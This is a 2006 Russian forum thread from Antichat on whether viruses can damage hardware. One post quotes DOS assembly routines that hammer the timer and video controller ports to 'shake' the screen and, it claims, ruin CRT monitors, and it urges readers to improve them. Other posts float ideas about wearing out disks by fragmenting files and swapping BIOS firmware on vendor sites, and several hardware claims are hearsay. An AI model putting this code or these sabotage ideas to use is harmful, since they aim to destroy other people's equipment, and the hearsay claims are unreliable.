ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.

Ответ

Опции темы Поиск в этой теме Опции просмотра

Старый 06.07.2006, 14:28
DimaHbl4
Участник форума
Провел на форуме:
565298

Теперь можно из под Винды замутить поднятие Fsb и если мать, не предназначена для оверклокинга то она тупо загнется. Знаю на личном опыте...

Старый 06.07.2006, 19:09
Rabid Rabbit
Участник форума
Провел на форуме:
249275

DimaHbl4, это какаято уникальная материнка да=) А воще на ноуте моно и из под винды замутить - запустить напр игрульку и фс6 поднимется=)
Цитата:
Сообщение от W!z@rD  
собственно и на это можно подействовать (краем уха слышал что можно сжечь путем прерываний 21h что-ли?!)
краем уха, слышал, прерывание 21 (это которое ДОС) чтоли ГГГГГГГГ жжош))))

Цитата:
Сообщение от VIYu  
Например превышиная подача наприжения на монитор
Ржунимагу

Цитата:
Сообщение от Elekt  
Кажется существует вирус, стирающий служебные секторы, при порче которых восстановить работоспособность можно лишь на заводе-производителе.
в домашних условиях - низкоуровневым форматированием: сектора, дорожки, цилиндры, фактор чередования (или перекрытия) - это еще в те времена когда эти слова еще чтото означали реальное. Сейчас это просто виртуальные переменные, ничего общего с физическим положением считывающей головки на поверхности диска не имеющие. Ну а интерлив фактор остался только для дискет.

Цитата:
Была зараза, разбивающая жёсткий на n логических дисков, размером каждый по 1.4 Мгб. Я не знаю, байка или нет, но говрят, что при кол-ве логических разделов, превышающем 1024 происходит порча(!!!) оперативной памяти. Тип уязвимой памяти мне не изестен.
Бугага))

ЗЫ ЭЛТ-Мониторы действительно можно накрыть но не все.
Код:
Эта пpоцедypа висела на int 8 (реальный режим) - она пpосто тpясет экpан.....
        push dx
        mov al,2
        out 40h,al
        mov al,3
        out 40h,al
        mov dx,3dah
        in al,dx
        mov dl,0c0h
        mov al,33h
        out dx,al
        mov ax,word ptr cs:[offset _fd-100h]
        out dx,al
        add al,ah
        test al,8
        je _o08
        not ah
        add al,ah
_o08:
        mov word ptr cs:[offset _fd-100h],ax
        pop dx
_fd     dw 0ffh
итд...
А вот дpyгая пpоцедypа, котоpая выполняется паpаллельно:
В общем MAIN procedure:
          mov ax,40h
          mov es,ax
_video_gluk:
             mov dx,es:[63h]
             in al,40h
             out dx,al
             mov dl,0c0h
             out dx,al
             mov dx,3b4h
             xor al,ah
             sub ah,al
             out dx,ax
           jmp _video_gluk
Главная  сyть ясна, так что yлyчшайте, главное - не останавливаться на
достигнyтом....  Вышепpиведеные пpоцедypы пpовеpены, но Я не могy на 100%
yтвеpждать  что  y  вас  полyчится  -  на  ваших видеокаpте и монитоpе. Тyт
зависит  от  пpоизводительности  тачки  (хотя  непонятно,  почемy, но - чем
быстpее,  тем  кpyче)  и,  видимо,  от  монитоpа...  Кстати,  те починенные
монитоpы  все  pавно  как-то тоpмозят... В частности тоpмозное пеpеpyбление
pежимов и т.д. Видимо, хpеново чинят...;)
(c) Black Angel

Старый 06.07.2006, 19:17
tclover
Banned
Провел на форуме:
9751364

Топик переполненный тупостью и бредом больше, чем любой другой на античате.... монитор сломать... мда...

Старый 06.07.2006, 21:54
DisturbeR
Участник форума
Провел на форуме:
1166355

Цитата:
DimaHbl4, это какаято уникальная материнка да=) А воще на ноуте моно и из под винды замутить - запустить напр игрульку и фс6 поднимется=)
Уникальности здесь никакой нет. Даже на моих старых материнках 3-4 летней давности можно было из под винды не только повышать fsb, но и напряжение на на проц, agp и др. Поднятием fsb по опыту знаю спалить чего-нибудь трудно. У меня месяцами работали системы на полном максимуме, без побочных эффектов.
НО, на некоторых материнках существуют просто нереальные интервалы, в плане поднятия напряжения, завышенные многократно. Возможно, если выставить максимальные значения, чего нибудь и выйдет. Однако на себе не проверял, может система просто выпадет в даун… хз.

Старый 07.07.2006, 11:44
Rabid Rabbit
Участник форума
Провел на форуме:
249275

DisturbeR, уникальная в том смысле что палится таким макаром. вобщем это спорный вопрос. дешевые материнки бывает и просто так летят, от скачков напряжения напр (если БП плохо фильтрует). а вообще я никогда не сталкивался с такими материнками где это можно мутить изпод винды. у меня асусы постоянно и один раз солтек была. утилиты для работы с видюхой пользовал но это не одно и тоже. мне думается тут 2 варианта: или выпадет в даун или будут сбои. один раз из-за перегрева проца был случай на старой тачке (амдэха 100 пр 133) улетел диск Цэ (практически пошли вразнос ФАТы и БутРекорд, попортилось файло)
. Нашкодило здорово так.

Последний раз редактировалось Rabid Rabbit; 07.07.2006 в 12:03..

Старый 07.07.2006, 12:07
DisturbeR
Участник форума
Провел на форуме:
1166355

Цитата:
а вообще я никогда не сталкивался с такими материнками где это можно мутить изпод винды. у меня асусы постоянно и один раз солтек была. по идее изменения должны вступить после перезапуска?
Из тех что помню - Soltek SL-FRN3, на nForce-2 Ultra (под сокет А) – с помощью nForce_sys_util и Giga-Byte GA-PE800, на Intel i845PE (под 478 сокет) – c помощью Gigabyte_EasyTune4.
Перезагружаться не надо. Жмем кнопку, значения меняются на лету.

Старый 07.07.2006, 13:44
Tikson
Постоянный
Провел на форуме:
1387660

Кловер какой пароль на книгу Криса Касперски с nnm.ru ?

Старый 07.07.2006, 17:17
kissa
Новичок
Провел на форуме:
24306

Собственно говоря, вы зря смеетесь, так как действительно есть вири которые портят железо. Неверите могу поспорить на деньги.

Старый 07.07.2006, 18:36
ArmageddonPro
Постоянный
Провел на форуме:
1319036

Отправить сообщение для ArmageddonPro с помощью ICQ

Разработчики железа, наверное, тожа не дураки и уж постарались сделать всё возможное, чтобы железо нельзя было испортить.
Теоретически можно предположить, что проц можно убить! Но как это сделать? Фактически нужно просто заставить его перегреться, но как? Выключить вентилятор на процессоре, но мать тогда просто вырубит питание и мы обломаемся. Тогда нужно обмануть мать(сказав, что вентилятор работает на полную), но как это сделать не представляю себе возможным поскольку излишнее питание нужно куда-то девать. - Здесь облом полный. Может кто и раскажет. что-то другое
Хард: убить его не представляю себе возможным, но вот что-нить подпортить можно. Например, для чего проводиться дефрагментация все знают. А, что если мы поступим наоборот дефрагментации и будем дробить файлы, получая из них тысячи фрагментов на всём харде, - этим методом можно немного сократить жизнь харду поскольку считывающая головка будет усердно носиться по всей поверхности диска, причиняя себе физический износ, но долго ли? А нет, не долго, дело в том, что если мы так усердно начнём резать файлы в конечном итоге операционка начнёт грузиться очень и очень медленно и либо она сама произведёт дефрагментацию, либо её снесут и отформатируют жестак. - Вот и все старания и так же облом
ОЗУ: вообще никак не испортить
Видео, мать, сидюк: можно только подменить на официальном сайте прошивки к бивисам и тогда ликуй!!! Тоже можно восстановить!
У кого другие мнения?

Последний раз редактировалось ArmageddonPro; 07.07.2006 в 18:41..

Старый 07.07.2006, 18:42
ArmageddonPro
Постоянный
Провел на форуме:
1319036

Отправить сообщение для ArmageddonPro с помощью ICQ

Цитата:
Сообщение от kissa  
Собственно говоря, вы зря смеетесь, так как действительно есть вири которые портят железо. Неверите могу поспорить на деньги.
Всё же я склонен считать, что, если они и портят, то уж не железо , а прошивку, которую можно восстановить, но не всегда.

Ответ